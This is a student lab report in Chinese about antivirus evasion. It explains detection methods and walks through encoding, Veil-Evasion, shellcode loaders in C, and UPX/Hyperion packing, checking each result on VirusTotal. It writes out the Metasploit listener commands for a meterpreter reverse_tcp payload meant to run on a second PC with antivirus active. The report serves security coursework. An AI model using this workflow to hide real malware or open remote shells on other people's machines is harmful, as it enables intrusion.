1.實驗內容
本週學習
免殺:英文為 Anti-AntiVirus(簡寫Virus AV),逐字翻譯為“反·反病毒”,翻譯為“反防毒技術”。一般是對惡意軟體做處理,讓它不被防毒軟體所檢測。也是滲透測試中需要使用到的技術。
防毒軟體原理。
免殺處理:對生成的惡意程式碼進行免殺處理,加殼。
測試與驗證:將處理後的惡意程式碼上傳到病毒檢測網站進行測試,檢視其被防毒軟體檢測的情況。
問題回答:
(1)殺軟是如何檢測出惡意程式碼的?
基於特徵碼的檢測:防毒軟體的病毒庫會記錄一些惡意軟體的特徵碼,這些特徵碼由不大於64位元組的字串組成,且是隻有該病毒內才出現的字串。當防毒軟體檢測到程式時,會將程式與病毒庫中的特徵碼進行比對,從而判斷是否是惡意程式碼。
啟發式惡意軟體的檢測:這種檢測方式將一個軟體與惡意軟體的行為、程式碼等進行比對,如果發現相似度達到一定程度,即判定這個程式為惡意程式碼。不過,這種方式有一定的誤報可能。
基於行為的惡意軟體檢測:該方式會對執行的所有程序進行實時監控,如果有敏感行為,就會被認為是惡意程式。這是一種動態的監測與捕捉方法。
(2)免殺是做什麼?
免殺:英文為 Anti-AntiVirus(簡寫Virus AV),逐字翻譯為“反·反病毒”,翻譯為“反防毒技術”。一般是對惡意軟體做處理,讓它不被防毒軟體所檢測。也是滲透測試中需要使用到的技術(3)免殺的基本方法有哪些?
①修改特徵碼
②修改校驗和
③花指令免殺
④加殼免殺
實踐內容
(1)正確使用msf編碼器,veil-evasion,自己利用shellcode程式設計等免殺工具或技巧
正確使用msf編碼器,使用msfvenom生成如jar之類的其他檔案
veil,加殼工具
使用C + shellcode程式設計
(2)透過組合應用各種技術實現惡意程式碼免殺
如果成功實現了免殺的,簡單語言描述原理,不要截圖。與殺軟共生的結果驗證要截圖。
(3)用另一電腦實測,在殺軟開啟的情況下,可執行並回連成功,註明電腦的殺軟名稱與版本
2.實驗過程
(1)學習使用免殺工具msf編碼器
①使用msf編碼器,使用msfvenom生成後門程式,登入VirusTotal網站檢測
②編碼10次,登入VirusTotal網站檢測
③生成jar檔案,登入VirusTotal網站檢測
④生成php檔案,登入VirusTotal網站檢測
⑤生成py檔案,登入VirusTotal網站檢測
(2)學習使用免殺工具Veil
①下載Veil
mkdir -p ~/.cache/wine cd ~/.cache/wine wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi sudo apt-get install libncurses5* sudo apt-get install libavutil55* sudo apt-get install gcc-mingw-w64* dpkg --add-architecture i386 sudo apt-get update sudo apt-get install wine32 apt-get install veil ——安裝veil sudo su cd /usr/share/veil/config/ vim setup.sh
②完成安裝後輸入veil
②進入Evil—Evasion
③檢視可使用的payload型別
④輸入use 7
⑤生成可執行檔案
⑥檢視可執行檔案
⑦將20222402veil.exe檔案移入主機,使用VirusTotal進行檢測
(3)使用C + shellcode程式設計
①生成一段shellcode
②新建一個.c檔案,將shellcode和下圖程式碼輸入,並儲存
③編譯.c檔案
④將20222402.exe檔案移入主機,使用VirusTotal進行檢測
(4)學習使用加殼工具
①upx加殼
②hyperion加殼
③將upx20222402.exe,upx20222402_1.exe檔案移入主機,使用VirusTotal進行檢測
(5)透過組合應用各種技術實現惡意程式碼免殺
①透過msfvenom生成Shellcode陣列
②新建一個.c檔案,將shellcode和下圖程式碼輸入,並儲存
③編譯
④加殼
⑤將檔案傳到主機,並開啟防毒軟體
(6) 用另一電腦實測
電腦版本:windows11
防毒軟體:金山毒霸
①輸入msfconsole進入控制檯,依次輸入:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.118
set LPORT 2402
exploit
②在主機端啟動upx20222402_1.exe檔案
③金山毒霸查殺結果
3.問題及解決方案
- 問題1:虛擬機器生成的檔案不能快速傳輸到主機,ncat有時會傳輸失敗
- 問題1解決方案:使用Winscp,更方便地傳輸檔案
- 問題2:在主機上的免殺測試失敗
- 問題2解決方案:反覆測試後未能找出原因
4.學習感悟、思考等
在這次關於免殺技術的實驗中,我經歷了一個從理論到實踐、從陌生到熟悉的全面學習過程。
實驗初期,我面對的是一系列陌生的工具和術語,如msf編碼器、veil-evasion、加殼工具以及shellcode程式設計等。這些工具和技術雖然強大,但使用起來也頗具挑戰性。在學習的過程中,我不斷查閱文件、觀看教程,甚至在一些技術論壇上尋求幫助。
在實驗的過程中,我深刻體會到了免殺技術的複雜性和多變性。透過不斷調整和最佳化程式碼、嘗試不同的編碼器和加殼工具,我逐漸掌握瞭如何透過多種技術手段的組合使用來提高惡意程式碼的抗檢測能力。
透過本次實驗,我深刻體會到了免殺技術的重要性和複雜性。免殺技術不僅需要對惡意程式碼進行深入的分析和理解,還需要掌握多種技術手段和工具。同時,免殺技術也是一個不斷髮展和變化的領域,需要不斷學習和更新知識。
此外,免殺技術的發展也提醒我們,防毒軟體需要不斷更新和升級,以應對日益複雜的惡意程式碼威脅。同時,我們也應該加強網路安全意識,提高自我保護能力,避免成為惡意程式碼的受害者。
參考資料
- 《使用winscp連線kali》 ]